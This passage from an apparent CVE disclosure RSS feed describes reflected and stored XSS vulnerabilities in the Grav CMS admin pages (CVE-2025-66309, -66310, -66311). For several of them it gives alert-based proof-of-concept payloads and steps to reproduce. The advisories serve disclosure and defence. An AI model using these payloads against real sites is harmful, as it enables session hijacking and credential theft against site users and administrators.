&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66309&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;GET /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user input in the &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt; parameter. As a result, attackers can craft a malicious URL with an XSS payload. When this URL is accessed, the injected script is reflected back in the HTTP response and executed within the context of the victim&amp;#39;s browser session.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;ImG&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;sRc&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;OnErRoR&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;XSS-PoC3&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Log in to the Grav Admin Panel and navigate to &amp;lt;b&amp;gt;Pages&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Create a new page or edit an existing one.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;In the &amp;lt;b&amp;gt;Advanced &amp;gt; Blog Config &amp;gt; Items field&amp;lt;/b&amp;gt; (which maps to &amp;lt;code&amp;gt;data[header][content][items]&amp;lt;/code&amp;gt;), insert the payload above.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66309/image.png&amp;#34;
	width=&amp;#34;1910&amp;#34;
	height=&amp;#34;510&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66309/image_hu_e1d1fb13d9a9b4e7.png 480w, /p/cve-2025-66309/image_hu_3a3afba466c81fbb.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;374&amp;#34;
		data-flex-basis=&amp;#34;898px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Save the page.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;The malicious payload is reflected and rendered by the application without proper sanitization. The JavaScript code is immediately executed in the browser.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66309/image-1.png&amp;#34;
	width=&amp;#34;991&amp;#34;
	height=&amp;#34;534&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66309/image-1_hu_a0c6b4602ec1b3c4.png 480w, /p/cve-2025-66309/image-1_hu_db37a16e3222c488.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;185&amp;#34;
		data-flex-basis=&amp;#34;445px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-65mj-f7p4-wggq&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66310</title>
        <link>https://www.cvehunters.com/p/cve-2025-66310/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-66310/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66310-cross-site-scripting-xss-stored-endpoint-adminpagespage-parameter-dataheadertemplate-in-advanced-tab&amp;#34;&amp;gt;CVE-2025-66310: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; in Advanced Tab
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; parameter. The script is saved within the page&amp;#39;s frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66310-cross-site-scripting-xss-stored-endpoint-adminpagespage-parameter-dataheadertemplate-in-advanced-tab&amp;#34;&amp;gt;CVE-2025-66310: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; in Advanced Tab
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66310&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; parameter. The script is saved within the page&amp;#39;s frontmatter and executed automatically whenever the affected content is rendered in the administrative interface or frontend view.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user input in the &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt; field, which is stored in the YAML frontmatter of the page. An attacker can inject JavaScript code using this field, and the payload is rendered and executed when the page is accessed, especially within the Admin Panel interface.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-fallback&amp;#34; data-lang=&amp;#34;fallback&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;amp;#39;PoC-XXS73&amp;amp;#39;)&amp;amp;lt;/script&amp;amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h3 id=&amp;#34;steps-to-reproduce&amp;#34;&amp;gt;Steps to Reproduce:
&amp;lt;/h3&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Log in to the Grav Admin Panel and navigate to &amp;lt;b&amp;gt;Pages&amp;lt;/b&amp;gt;.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Create a new page or edit an existing one.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;In the &amp;lt;b&amp;gt;Advanced &amp;gt; Template&amp;lt;/b&amp;gt; field (which maps to &amp;lt;code&amp;gt;data[header][template]&amp;lt;/code&amp;gt;), insert the payload:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66310/image.png&amp;#34;
	width=&amp;#34;1910&amp;#34;
	height=&amp;#34;695&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66310/image_hu_8bfe0d4dea5df50c.png 480w, /p/cve-2025-66310/image_hu_98b89a8f489219fc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;274&amp;#34;
		data-flex-basis=&amp;#34;659px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Save the page.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Return to the &amp;lt;b&amp;gt;Pages&amp;lt;/b&amp;gt; section and click on the &amp;lt;b&amp;gt;three-dot menu&amp;lt;/b&amp;gt; of the affected page:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66310/image-1.png&amp;#34;
	width=&amp;#34;819&amp;#34;
	height=&amp;#34;625&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66310/image-1_hu_910ecbc70fceca54.png 480w, /p/cve-2025-66310/image-1_hu_642c42209238d437.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;131&amp;#34;
		data-flex-basis=&amp;#34;314px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;The stored XSS payload is triggered, and the script is executed in the browser:&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-66310/image-2.png&amp;#34;
	width=&amp;#34;753&amp;#34;
	height=&amp;#34;466&amp;#34;
	srcset=&amp;#34;/p/cve-2025-66310/image-2_hu_9b23293ebfc30995.png 480w, /p/cve-2025-66310/image-2_hu_ad614adf733a9c65.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;161&amp;#34;
		data-flex-basis=&amp;#34;387px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Session hijacking: Stealing cookies or authentication tokens to impersonate users.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Credential theft: Harvesting usernames and passwords using malicious scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Malware delivery: Distributing unwanted or harmful code to victims.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Privilege escalation: Compromising administrative users through persistent scripts.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Data manipulation or defacement: Changing or disrupting site content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputation damage: Eroding trust among site users and administrators.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/getgrav/grav/security/advisories/GHSA-7g78-5g5g-mvfj&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 01 Dec 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-66311</title>
        <link>https://www.cvehunters.com/p/cve-2025-66311/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-66311/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-66311-cross-site-scripting-xss-stored-endpoint-adminpagespage-in-multiples-parameters&amp;#34;&amp;gt;CVE-2025-66311: Cross-Site Scripting (XSS) Stored Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; in Multiples Parameters
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[header][metadata]&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data[header][taxonomy][category]&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data[header][taxonomy][tag]&amp;lt;/code&amp;gt; parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-66311-cross-site-scripting-xss-stored-endpoint-adminpagespage-in-multiples-parameters&amp;#34;&amp;gt;CVE-2025-66311: Cross-Site Scripting (XSS) Stored Endpoint &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; in Multiples Parameters
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-66311&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;/admin/pages/[page]&amp;lt;/code&amp;gt; endpoint of the Grav application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;data[header][metadata]&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data[header][taxonomy][category]&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data[header][taxonomy][tag]&amp;lt;/code&amp;gt; parameters. These scripts are stored in the page frontmatter and executed automatically whenever the affected page is accessed or rendered in the administrative interface.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /admin/pages/[page]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;data[header][metadata]&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;data[header][taxonomy][category]&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;data[header][taxonomy][tag]&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly sanitize user input when saving page metadata or taxonomy fields via the Admin Panel. As a result, an attacker with access to the admin interface can inject a malicious script using these parameters, and the script will be stored in the page&amp;#39;s YAML frontmatter. When the page or metadata is rendered (especially in the Admin Panel), the payload is executed in the browser of any user with access.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC-XXS51&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span 